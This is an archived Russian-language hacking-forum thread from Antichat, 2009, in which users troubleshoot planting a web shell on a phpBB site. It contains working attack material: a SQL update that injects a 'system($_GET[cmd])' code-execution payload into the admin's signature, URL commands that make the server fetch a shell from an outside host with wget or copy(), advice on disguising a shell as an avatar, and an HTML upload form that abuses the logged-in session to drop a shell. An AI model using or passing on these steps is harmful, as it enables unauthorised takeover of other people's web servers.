ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.06.2009, 20:40
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
phpinfo();
если в нём allow_url_fopen=on, делай copy('http:///ww.site.com/shell.txt','/tmp/shell.php');
потом инклудишь его
если off, смотриш на сейф мод, на дизейбл функшнс, там уже по обстоятельствам
|
|
|
30.06.2009, 22:17
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
Залил шелл через phpbb, с помощью востановления базы.......
PHP код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system($_GET[cmd])' WHERE user_id=2;
Пытаюсь залить madshell в папку /var/www/images/ (права есть).....
делаю так,
PHP код:
http://site.com/forum/profile.php?mode=editprofile&cmd=wget%20http://host.com/papka/shell.php%20-o%20/var/www/images/tyrytrytr.php
файл создался, но в ответ при открытие я получаю,
Код:
--17:50:03-- http://host.com/papka/shell.php => `shell.php' Resolving host.com... xx.xx.xx.xx Connecting to host.com[xx.xx.xx.xx]:80... failed: Connection timed out.
-------------------
Почему так???Что такое?? |
|
|
|
30.06.2009, 22:24
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Время подключения к хосту превышено, попробуй воспользоваться шеллом с другого сайта
|
|
|
|
30.06.2009, 22:34
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
я пробовал c madnet.name, freehostia, и со своих шеллов, не хочет что то
|
|
|
|
30.06.2009, 22:40
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Ну для начала можно научится юзать wget:
wget http://site.ru/1.txt -O shell.php - это сохранит скаченный файл с указанным именем
а не:
wget http://site.ru/1.txt -o shell.php - это поместит лог работы в указанный файл
Только если хост тормознутый, то это не лучший способ - загрузи аватарку с шеллом, а потом просто поменяй расширение на пхп.
|
|
|
|
30.06.2009, 23:10
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
врятли) разницы не вижу даже при substring'e
|
|
|
|
30.06.2009, 23:12
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
Сообщение от Grey
Ну для начала можно научится юзать wget:
wget http://site.ru/1.txt -O shell.php - это сохранит скаченный файл с указанным именем
а не:
wget http://site.ru/1.txt -o shell.php - это поместит лог работы в указанный файл
Только если хост тормознутый, то это не лучший способ - загрузи аватарку с шеллом, а потом просто поменяй расширение на пхп.
в данном случае нельзя грузить аватары, chmod на аватарки и images, cache, и все другое, доступны для записи только папки в корне сайта, но при
wget http://site.ru/1.txt -O shell.php , просто создается пустой файл нечего не качается....
|
|
|
|
30.06.2009, 23:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
cmd=copy('site/shell.txt', 'полный путь до папки drwrwrw/shell.php');
а чем тебе так не лучше?
|
|
|
|
30.06.2009, 23:17
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
HAXTA4OK, а толку? если у него хост не конектиться к другим серверам, что при wget'e что при copy результат будет один и тот же
|
|
|
|
30.06.2009, 23:23
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
А форму для загрузки не судьба использовать?
Локально такуйю форму:
Код:
<form action=http://site.com/forum/profile.php?mode=editprofile&cmd=copy($_FILES[file][tmp_name],$_GET[aa]);&aa=/var/www/images/tyrytrytr.php
method=post enctype=multipart/form-data>
<input type=file name=file><br>
<input type=submit value=Загрузить><br>
</form>
только предварительно сидеть у себя в браузере зарегенным на форуме в едит профайле и открывать эту форму в том же браузере, ибо куки. С сразу грузить с компа нормальный шелл |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
